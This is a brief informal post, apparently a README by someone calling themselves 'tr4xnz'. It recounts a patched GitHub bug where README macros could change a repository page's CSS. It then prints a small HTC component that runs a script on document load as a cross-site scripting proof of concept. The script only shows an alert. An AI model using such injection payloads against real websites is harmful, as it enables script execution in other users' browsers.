The Github CSS Vuln, a vulnerability where README.md macros were exploited to edit the CSS on one's repository's page, and it'll be stored on the server. This vulnerability's discovery was very surprising as Github is like a huge platform where major companies and developers share their projects and ideas. Luckily the vulnerability was patched.
I still believed that an XSS attack was possible using CSS's ability to load in .htc files to run Javascript code.
<PUBLIC:COMPONENT TAGNAME="xss">
<PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
function main() {
alert("Welcome to my github repo, ik very cool :P");
}
</SCRIPT>
Hello i am tr4xnz